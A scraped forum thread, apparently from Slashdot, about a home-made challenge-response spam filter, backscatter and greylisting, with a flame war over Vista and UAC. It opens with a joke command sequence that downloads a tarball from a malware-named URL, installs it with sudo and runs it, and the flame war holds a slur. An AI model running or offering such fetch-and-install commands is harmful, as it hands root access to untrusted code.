http://malware.makemoneyfast.ru/linux/virus/pwn3d-0.9a.tar.gz +tar zxvf pwn3d-0.9a.tar.gz
+cd pwn3d-0.9a
-./make infect
+make
+sudo make install
+./pwn3d
+
--
1.5.4.3
Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
Nope, you're not misreading. I take the reply to addresses at their word. If it bounces, it goes to a black hole set up for precisely that purpose (though yes, this is a lot unpleasant backscatter). The reason I took this approach was an experience I had setting up this one companies marketing system. Their previous system had been a sort of jury-rigged exchange box; but all their client's spam filters were set up to accept emails from it as legit. When we gave them a real email server, about 1/3 of all their communications were getting sucked up into spam filters because of tiny differences in the headers - we had to adjust it to spoof the old, goofy, headers from their previous system to get their invoices and stuff out. What that experience (and others) taught me is that a lot of small and medium size business simply don't have their email servers set up as well as spammers do; because email is not their core strength. And if you set up a spam trap that runs all those tests that a badly set up email server will fail - you're way to many risking false positives. The only way to perform a challenge response that avoids that is to, unfortunately, challenge. I'm sure there are ways to do that that would be more amenable to mail server operators and domain owners everywhere; but I haven't gotten to that stage yet. The primary purpose of the filter to completely eliminate false positives while still blocking the true positives - not eliminate backscatter. When the first problem is solved, then resources can be directed towards achieving secondary objectives.
Does that seem unethical to you? It's only running on 2 test accounts right now, unlike boxtrap which runs on hundreds of thousands. I can hardly afford to solve other people's problems for free if I don't solve any problems for hire first. Couldn't mail server software address spoofing more efficiently than filtering software? It wouldn't need to be filtered at all if it hadn't been accepted as legit in the first place. That's my thinking right now at least - but there's a lot about this stuff I don't know yet so please feel free to point my in the right direction if I've made a fundamental blunder here somewhere.
Thanks for the feedback.
Wow, how fucking cool are you? Thanks for the essay on how much more leet you are than the rest of us. If I actually cared about your opinion of me I'd go into detail explaining how UAC actually works, and how it doesn't "throw pop-ups" any more often than I see when using KDE. But I doubt you'd be able to understand that over the noise of your awesomeness.
Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
I guess you aren't finding it so dreadfully easy after all! ROTFLMA
The fact that you think any of this has anything to do with you is hillarious! You're confusing me with someone who wasn't a Vista Beta tester, and also with someone who lasks a clue to the degree that you do. HANL ...
Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
Oh LOLZORZ, you copied my sig and used it as a bullet point. How original.
You're right, I misspoke there. It must have been that petulant tone, it's dazzling. What I meant was that I don't care to correct retards about shit they make up to support their religious arguments. Especially when the religion is a fucking operating system.
Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
Yes, I know. That was evident when you refused to stand corrected ;-)
Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
Well, you sure showed me, didn't you?
Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
Yes. Better that you figure that out late than never, I suppose.
Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
It's been forever in slashdot time, sorry.
It's not necessarily unethical, but it adds to the problem of spam.
Every month or so, my network gets hit with hundreds of thousands of bounce messages from around the internet because a spammer is faking from addresses using my domain. Each bounce message comes from completely unrelated places and people. Some are mailbox full messages, some are "Your email contains a virus" messages, some are challenge response type messages like yours.
It's like voting, each person does make a difference :). Someone who thinks, "it's just one account" is one of the 300,000 bounce messages hitting my network in a single day.
I run a tiny network, the problem is much worse for big ones.
If you want to do something heavy handed to stop spam, I would suggest something more like greylisting. Reject (using smtp reject during the smtp conversation, not a bounce email) every email that comes in the first time. Spam sending bots and whatnot will not try again, real mail servers will.
You are right when you say "It wouldn't need to be filtered at all if it hadn't been accepted as legit in the first place." So, you don't accept then bounce, you reject up front with smtp reject.
Typically, reject is *always* better than bounce.
4096R/EF7BAFA6 79E1 DF98 D09D 898F 9A11 F6F0 DDDC 23FA EF7B AFA6
I totally agree, there *are* more stable ways of verifying a possibly spoofed "From" or "Reply" to address that simply using it and giving up if a response is not received in X # of days. Mark Perkel has some excellent techniques in this regard. And yes, doing something disruptive on a small scale (be it handling spam filter clumsily, or littering) does beg the question, "What if everyone did this?". However, I face two challenges in getting there.
1. The "after-the-fact" method I use results in an annoying situation where email clients see an email and notify the user, only minutes later to have the spam removed from the stream and the email not being there. Email clients don't tend to remove the notification once an email has been removed. This will be an even bigger aggravation for push clients. My challenges in preventing this are first, dealing with instabilities of the box it's running - where critical functions are frequently unavailable and second, the techniques I've seen other use require a much higher level of expertise for users of the so-called "Grandma Demographic". I may be able to solve the problem by moving this to a dedicated server - but that's a pricey solution that would be premature at this point in development.
2. To do this, I need to manipulate the stream myself. The only thing stopping me from doing that so far is the research. It's quite simple to use PHP built in mail functions, but by-passing all that encapsulation for a stream based approach (with the same degree of reliability I get using pre-made libraries) is going to take significantly more time.
They say the road to failure is paved with perfection, and the road to failure is paved with "Good Enough". For me, getting around #1 will constitute "Good Enough" - though frankly it's pretty damn good already other than having to wait up to 3 minutes between getting a "New Mail" notification and being able to check for email. Perfection is a 100% protection against false positives, accommodation of clumsily configured mail servers, complete ease of use for users, and lastly, making a program which is an ideal netizen itself. To achieve all that, I've got to read several books, and then rent a dedicated server where I can put I'll I've learned to use. Or just hire someone to assist me with that. Either way, it's going to take more money and time than I can currently devote the the problem. The "Not quite good enough" version I've been running for the past 2 years has at least saved me from being swamped with spam, and I am saving up both money and time to devote towards progressing towards a more perfect system.
But I hope I'm confident enough to launch something sometime in between the "Good Enough" milestone and the "Perfection" milestone. If there's anything that I've learned in the last 2 decades, it's that those who succeed in software don't wait until "Perfection" before going to market. Truly, I have yet to ever see a piece of perfect software even make it to production. For all it's flaws, I wouldn't shut off my clunky little program for my accounts for anything. Nor would I swap it for any other the other products or services I researched before reluctantly concluding I'd have to build something myself.
If you like, I'll let you know when I've got something more robust online and tell you what techniques I'm using to see if I've made any stupid mistakes.
Thanks for the advice.